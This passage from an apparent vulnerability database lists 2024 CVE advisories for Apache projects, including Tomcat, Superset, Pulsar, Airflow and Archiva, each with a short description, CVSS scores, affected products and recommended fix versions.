Request smuggling vulnerability in the HTTP server in Apache bRPC 0.9.5~1.7.0 on all platforms allows an attacker to smuggle requests. Vulnerability cause description: the http_parser does not comply with the RFC 7230 HTTP/1.1 specification. Attack scenario: if a message is received with both a Transfer-Encoding and a Content-Length header field, such a message might indicate an attempt to perform request smuggling or response splitting. One particular attack scenario is a bRPC-based HTTP server on the backend receiving requests over one persistent connection from a frontend server that parses requests using the Transfer-Encoding header with the logic that 'chunk' is contained in the TE field. In that case an attacker can smuggle a request into the connection to the backend server. Solution: you can choose one solution from below: 1. Upgrade bRPC to version 1.8.0, which fixes this issue. Download link: https://github.com/apache/brpc/releases/tag/1.8.0 2. Apply this patch: https://github.com/apache/brpc/pull/2518

Products Affected

Vendor Product Version
apache brpc *
CVE-2024-23454

Apache Hadoop's RunJar.run() does not set permissions for its temporary directory by default. If sensitive data is present there, all other local users may be able to view the content. This is because, on Unix-like systems, the system temporary directory is shared between all local users. As such, files written in this directory without explicitly setting the correct POSIX permissions may be viewable by all other local users.

Products Affected

Vendor Product Version
apache hadoop *
CVE-2024-23537

Improper Privilege Management vulnerability in Apache Fineract. This issue affects Apache Fineract: <1.8.5. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.4 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L 1.8 6.0

Products Affected

Vendor Product Version
apache fineract *
CVE-2024-23538

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Fineract. This issue affects Apache Fineract: <1.8.5. Users are recommended to upgrade to version 1.8.5 or 1.9.0, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L 3.1 6.0

Products Affected

Vendor Product Version
apache fineract *
CVE-2024-23539

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Fineract. This issue affects Apache Fineract: <1.8.5. Users are recommended to upgrade to version 1.8.5 or 1.9.0, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.3 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H 2.8 5.5

Products Affected

Vendor Product Version
apache fineract *
CVE-2024-23590

Session Fixation vulnerability in Apache Kylin. This issue affects Apache Kylin: from 2.0.0 through 4.x. Users are recommended to upgrade to version 5.0.0 or above, which fixes the issue.

Products Affected

Vendor Product Version
apache kylin *
CVE-2024-23672

Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open, leading to increased resource consumption. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99, which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
debian debian_linux 10.0
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-23673

Malicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver. This issue affects all versions of Apache Sling Servlets Resolver before 2.11.0. However, whether a system is vulnerable to this attack depends on the exact configuration of the system. If the system is vulnerable, a user with write access to the repository might be able to trick the Sling Servlet Resolver into loading a previously uploaded script. Users are recommended to upgrade to version 2.11.0, which fixes this issue. It is recommended to upgrade regardless of whether your system configuration currently allows this attack or not.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache sling_servlets_resolver *
CVE-2024-23807

The Apache Xerces C++ XML parser in versions from 3.0.0 before 3.2.5 contains a use-after-free error triggered during the scanning of external DTDs. Users are recommended to upgrade to version 3.2.5, which fixes the issue, or mitigate the issue by disabling DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable. This issue was disclosed before as CVE-2018-1311, but unfortunately that advisory incorrectly stated the issue would be fixed in version 3.2.3 or 3.2.4.

Products Affected

Vendor Product Version
apache xerces-c++ *
CVE-2024-23944

Information disclosure in persistent watcher handling in Apache ZooKeeper due to a missing ACL check. It allows an attacker to monitor child znodes by attaching a persistent watcher (addWatch command) to a parent to which the attacker already has access. The ZooKeeper server does not perform an ACL check when the persistent watcher is triggered, and as a consequence the full path of znodes on which a watch event is triggered is exposed to the owner of the watcher. It is important to note that only the path is exposed by this vulnerability, not the znode's data, but since a znode path can contain sensitive information like a user name or login ID, this issue is potentially critical. Users are recommended to upgrade to version 3.9.2 or 3.8.4, which fix the issue.

Products Affected

Vendor Product Version
apache zookeeper *
CVE-2024-23945

Signing cookies is an application security feature that adds a digital signature to cookie data to verify its authenticity and integrity. The signature helps prevent malicious actors from modifying the cookie value, which can lead to security vulnerabilities and exploitation. Apache Hive's service component accidentally exposes the signed cookie to the end user when there is a mismatch in signature between the current and expected cookie. Exposing the correct cookie signature can lead to further exploitation. The vulnerable CookieSigner logic was introduced in Apache Hive by HIVE-9710 (1.2.0) and in Apache Spark by SPARK-14987 (2.0.0). The affected components are the following:
* org.apache.hive:hive-service
* org.apache.spark:spark-hive-thriftserver_2.11
* org.apache.spark:spark-hive-thriftserver_2.12

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache hive *
apache spark 3.5.0
apache spark *
CVE-2024-23946

Possible path traversal in Apache OFBiz allowing file inclusion. Users are recommended to upgrade to version 18.12.12, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-23952

This is a duplicate of CVE-2023-46104, with correct CVE version ranges for affected Apache Superset. Uncontrolled resource consumption can be triggered by an authenticated attacker who uploads a malicious ZIP to import databases, dashboards or datasets. This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2024-23953

Use of Arrays.equals() in LlapSignerImpl in Apache Hive to compare message signatures allows an attacker to forge a valid signature for an arbitrary message byte by byte. The attacker must be an authorized user of the product to perform this attack. Users are recommended to upgrade to version 4.0.0, which fixes this issue. The problem occurs when an application does not use a constant-time algorithm for validating a signature. The method Arrays.equals() returns false as soon as it sees that one of the input bytes differs, so the comparison time depends on the contents of the arrays. This may allow an attacker to forge a valid signature for an arbitrary message byte by byte, which might in turn allow malicious users to submit splits/work with selected signatures to LLAP without running as a privileged user, potentially leading to a DDoS attack. More details in the reference section.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache hive *
CVE-2024-24549

Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99, which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
debian debian_linux 10.0
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-24683

Improper Input Validation vulnerability in Apache Hop Engine. This issue affects Apache Hop Engine: before 2.8.0. Users are recommended to upgrade to version 2.8.0, which fixes the issue. When Hop Server writes links to the PrepareExecutionPipelineServlet page, one of the parameters provided to the user was not properly escaped. The variable not properly escaped is the "id", which is not directly accessible by users creating pipelines, making the risk of exploitation low. This issue only affects users using the Hop Server component and does not directly affect the client.

Products Affected

Vendor Product Version
apache hop_engine *
CVE-2024-24746

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache NimBLE. A specially crafted GATT operation can cause an infinite loop in the GATT server, leading to denial of service in the Bluetooth stack or device. This issue affects Apache NimBLE: through 1.6.0. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-24772

A guest user could exploit a chart data REST API and send arbitrary SQL statements that on error could leak information from the underlying analytics database. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-24773

Improper parsing of nested SQL statements on SQLLab would allow authenticated users to surpass their data authorization scope. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2024-24778

Improper privilege management in a REST interface allowed registered users to access unauthorized resources if the resource ID was known. This issue affects Apache StreamPipes: through 0.95.1. Users are recommended to upgrade to version 0.97.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-24779

Apache Superset with custom roles that include `can write on dataset` and without all data access permissions allows users to create virtual datasets on data they do not have access to. These users could then use those virtual datasets to get access to unauthorized data. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.0 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N 3.1 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-24780

Remote Code Execution with untrusted URI of UDF vulnerability in Apache IoTDB. An attacker who has the privilege to create UDFs can register a malicious function from an untrusted URI. This issue affects Apache IoTDB: from 1.0.0 before 1.3.4. Users are recommended to upgrade to version 1.3.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache iotdb *
CVE-2024-24795

HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack. Users are recommended to upgrade to version 2.4.59, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 38
netapp ontap 9
apple macos *
broadcom fabric_operating_system -
debian debian_linux 10.0
fedoraproject fedora 39
netapp ontap_tools 10
fedoraproject fedora 40
CVE-2024-25065

Possible path traversal in Apache OFBiz allowing authentication bypass. Users are recommended to upgrade to version 18.12.12, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-25090

Insufficient input validation and sanitization in the Profile name & screenname, Bookmark name & description and blogroll name features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: if you do not have Roller configured for untrusted users, then you need to do nothing, because you trust your users to author raw HTML and other web content. If you are running with untrusted users then you should upgrade to Roller 6.1.3. This issue affects Apache Roller: from 5.0.0 before 6.1.3. Users are recommended to upgrade to version 6.1.3, which fixes the issue.

Products Affected

Vendor Product Version
apache roller *
CVE-2024-25141

When SSL was enabled for the Mongo Hook, the default settings included "allow_insecure", which caused certificates not to be validated. This was unexpected and undocumented. Users are recommended to upgrade to version 4.0.0, which fixes this issue.

Products Affected

Vendor Product Version
apache apache-airflow-providers-mongo *
CVE-2024-25142

Use of Web Browser Cache Containing Sensitive Information vulnerability in Apache Airflow. Airflow did not return a "Cache-Control" header for dynamic content, which in the case of some browsers could result in sensitive data being stored in the browser's local cache. This issue affects Apache Airflow: before 2.9.2. Users are recommended to upgrade to version 2.9.2, which fixes the issue.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-25710

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.3 through 1.25.0. Users are recommended to upgrade to version 1.26.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.1 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H 1.4 6.0

Products Affected

Vendor Product Version
apache commons_compress *
CVE-2024-26016

A low-privilege authenticated user could import an existing dashboard or chart that they do not have access to and then modify its metadata, thereby gaining ownership of the object. However, it is important to note that access to the analytical data of these charts and dashboards would still be subject to validation based on data access privileges. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-26280

Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated Ops and Viewer users to view all information in the audit logs, including DAG names and usernames they were not permitted to view. With 2.8.2 and newer, Ops and Viewer users do not have audit log permission by default; they need to be explicitly granted permission to see the logs. Only admin users have audit log permission by default. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-26307

Possible race condition vulnerability in Apache Doris. Some of the code uses the `chmod()` method, which runs the risk of someone renaming the file out from under the user so that the wrong file gets chmodded. This could theoretically happen, but the impact would be minimal. This issue affects Apache Doris: before 1.2.8, before 2.0.4. Users are recommended to upgrade to version 2.0.4, which fixes the issue.

Products Affected

Vendor Product Version
apache doris *
CVE-2024-26308

Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.21 before 1.26. Users are recommended to upgrade to version 1.26, which fixes the issue.

Products Affected

Vendor Product Version
apache commons_compress *
CVE-2024-26578

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.1. Repeated submission during registration resulted in the registration of the same user. When users register, if they rapidly submit multiple registrations using scripts, it can result in the creation of multiple user accounts simultaneously with the same name. Users are recommended to upgrade to version [1.2.5], which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-26579

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.7.0 through 1.11.0; attackers can bypass using malicious parameters. Users are advised to upgrade to Apache InLong 1.12.0 or cherry-pick [1], [2] to solve it. [1] https://github.com/apache/inlong/pull/9694 [2] https://github.com/apache/inlong/pull/9707

Products Affected

Vendor Product Version
apache inlong *
CVE-2024-26580

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.8.0 through 1.10.0; attackers can use a specific payload to read from an arbitrary file. Users are advised to upgrade to Apache InLong 1.11.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9673

Products Affected

Vendor Product Version
apache inlong *
CVE-2024-27135

Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.2.0
CVE-2024-27136

XSS in the Upload page in Apache JSPWiki 2.12.1 and prior allows an attacker to execute JavaScript in the victim's browser and obtain some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.12.2 or later.

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2024-27137

In Apache Cassandra it is possible for a local attacker without access to the Apache Cassandra process or configuration files to manipulate the RMI registry to perform a man-in-the-middle attack and capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and perform unauthorized operations. This is the same vulnerability that CVE-2020-13946 was issued for, but the Java option was changed in JDK 10. This issue affects Apache Cassandra from 4.0.2 through 5.0.2 running Java 11. Operators are recommended to upgrade to a release equal to or later than 4.0.15, 4.1.8, or 5.0.3, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 1.8 3.4

Products Affected

Vendor Product Version
apache cassandra 5.0.0
apache cassandra *
CVE-2024-27138

** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva. Apache Archiva has a setting to disable user registration; however, this restriction can be bypassed. As Apache Archiva has been retired, we do not expect to release a version of Apache Archiva that fixes this issue. You are recommended to look into migrating to a different solution, or isolate your instance from any untrusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache archiva *
CVE-2024-27139

** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva: a vulnerability in Apache Archiva allows an unauthenticated attacker to modify account data, potentially leading to account takeover. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache archiva *
CVE-2024-27140

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Archiva. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. Alternatively, you could configure a HTTP proxy in front of your Archiva instance to only forward requests that do not have malicious characters in the URL. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache archiva *
CVE-2024-27181

In Apache Linkis <= 1.5.0, privilege escalation in the basic management services, where the attacking user is a trusted account, allows access to Linkis's token information. Users are advised to upgrade to version 1.6.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2024-27182

In Apache Linkis <= 1.5.0, arbitrary file deletion in the basic management services: a user with an administrator account could delete any file accessible to the Linkis system user. Users are recommended to upgrade to version 1.6.0, which fixes this issue.

Products Affected

Vendor Product Version
apache linkis *
CVE-2024-27309

While an Apache Kafka cluster is being migrated from ZooKeeper mode to KRaft mode, in some cases ACLs will not be correctly enforced. Two preconditions are needed to trigger the bug: 1. The administrator decides to remove an ACL. 2. The resource associated with the removed ACL continues to have two or more other ACLs associated with it after the removal. When those two preconditions are met, Kafka will treat the resource as if it had only one ACL associated with it after the removal, rather than the two or more that would be correct. The incorrect condition is cleared by removing all brokers in ZK mode, or by adding a new ACL to the affected resource. Once the migration is completed, there is no metadata loss (the ACLs all remain). The full impact depends on the ACLs in use. If only ALLOW ACLs were configured during the migration, the impact would be limited to availability impact. If DENY ACLs were configured, the impact could include confidentiality and integrity impact depending on the ACLs configured, as the DENY ACLs might be ignored due to this vulnerability during the migration period.

Products Affected

Vendor Product Version
apache kafka *
CVE-2024-27315

An authenticated user with privileges to create Alerts on Alerts & Reports has the capability to generate a specially crafted SQL statement that triggers an error on the database. This error is not properly handled by Apache Superset and may inadvertently surface in the error log of the Alert exposing possibly sensitive data. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-27316

HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 38
netapp ontap 9
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-27317

In Pulsar Functions Worker, authenticated users can upload functions in jar or nar files. These files, essentially zip files, are extracted by the Functions Worker. However, if a malicious file is uploaded, it could exploit a directory traversal vulnerability. This occurs when the filenames in the zip files, which aren't properly validated, contain special elements like "..", altering the directory path. This could allow an attacker to create or modify files outside of the designated extraction directory, potentially influencing system behavior. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.4 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L 1.8 6.0

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.2.0
CVE-2024-27347

Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble. This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0. Users are recommended to upgrade to version 1.3.0, which fixes the issue.

Products Affected

Vendor Product Version
apache hugegraph-hubble *
CVE-2024-27348

RCE (Remote Command Execution) vulnerability in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 on Java 8 and Java 11. Users are recommended to upgrade to version 1.3.0 with Java 11 and enable the Auth system, which fixes the issue.

Products Affected

Vendor Product Version
apache hugegraph *
CVE-2024-27349

Authentication Bypass by Spoofing vulnerability in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0. Users are recommended to upgrade to version 1.3.0, which fixes the issue.

Products Affected

Vendor Product Version
apache hugegraph *
CVE-2024-27438

Download of Code Without Integrity Check vulnerability in Apache Doris. The JDBC driver files used for a JDBC catalog are not checked and may result in remote command execution. Once an attacker is authorized to create a JDBC catalog, they can supply an arbitrary driver jar file containing unchecked code. This code runs when the catalog is initializing, without any check. This issue affects Apache Doris: from 1.2.0 through 2.0.4. Users are recommended to upgrade to version 2.0.5 or 2.1.x, which fixes the issue.

Products Affected

Vendor Product Version
apache doris *
CVE-2024-27439

An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket. This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series. Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected. Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.

Products Affected

Vendor Product Version
apache wicket 10.0.0
apache wicket *
CVE-2024-27894

The Pulsar Functions Worker includes a capability that permits authenticated users to create functions where the function's implementation is referenced by a URL. The supported URL schemes include "file", "http", and "https". When a function is created using this method, the Functions Worker will retrieve the implementation from the URL provided by the user. However, this feature introduces a vulnerability that can be exploited by an attacker to gain unauthorized access to any file that the Pulsar Functions Worker process has permissions to read. This includes reading the process environment which potentially includes sensitive information, such as secrets. Furthermore, an attacker could leverage this vulnerability to use the Pulsar Functions Worker as a proxy to access the content of remote HTTP and HTTPS endpoint URLs. This could also be used to carry out denial of service attacks. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. The updated versions of Pulsar Functions Worker will, by default, impose restrictions on the creation of functions using URLs. For users who rely on this functionality, the Function Worker configuration provides two configuration keys: "additionalEnabledConnectorUrlPatterns" and "additionalEnabledFunctionsUrlPatterns". 
These keys allow users to specify a set of URL patterns that are permitted, enabling the creation of functions using URLs that match the defined patterns. This approach ensures that the feature remains available to those who require it, while limiting the potential for unauthorized access and exploitation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.2.0
CVE-2024-27905

** UNSUPPORTED WHEN ASSIGNED ** Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Aurora. An endpoint exposing internals to unauthenticated users can be used as a "padding oracle" allowing an anonymous attacker to construct a valid authentication cookie. Potentially this could be combined with vulnerabilities in other components to achieve remote code execution. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache aurora *
CVE-2024-27906

Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated users to view DAG code and import errors of DAGs they do not have permission to view through the API and the UI. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-28098

The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings. These management operations should be restricted to users with the tenant admin role or super user role. This issue affects Apache Pulsar versions from 2.7.1 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Apache Pulsar users should upgrade to at least 2.10.6. 2.11 Apache Pulsar users should upgrade to at least 2.11.4. 3.0 Apache Pulsar users should upgrade to at least 3.0.3. 3.1 Apache Pulsar users should upgrade to at least 3.1.3. 3.2 Apache Pulsar users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 3.1 2.7

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.2.0
CVE-2024-28148

An authenticated user could potentially access metadata for a datasource they are not authorized to view by submitting a targeted REST API request. This issue affects Apache Superset: before 3.1.2. Users are recommended to upgrade to version 3.1.2 or above, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-28168

Improper Restriction of XML External Entity Reference ('XXE') vulnerability in Apache XML Graphics FOP. This issue affects Apache XML Graphics FOP: 2.9. Users are recommended to upgrade to version 2.10, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache formatting_objects_processor 2.9
CVE-2024-28746

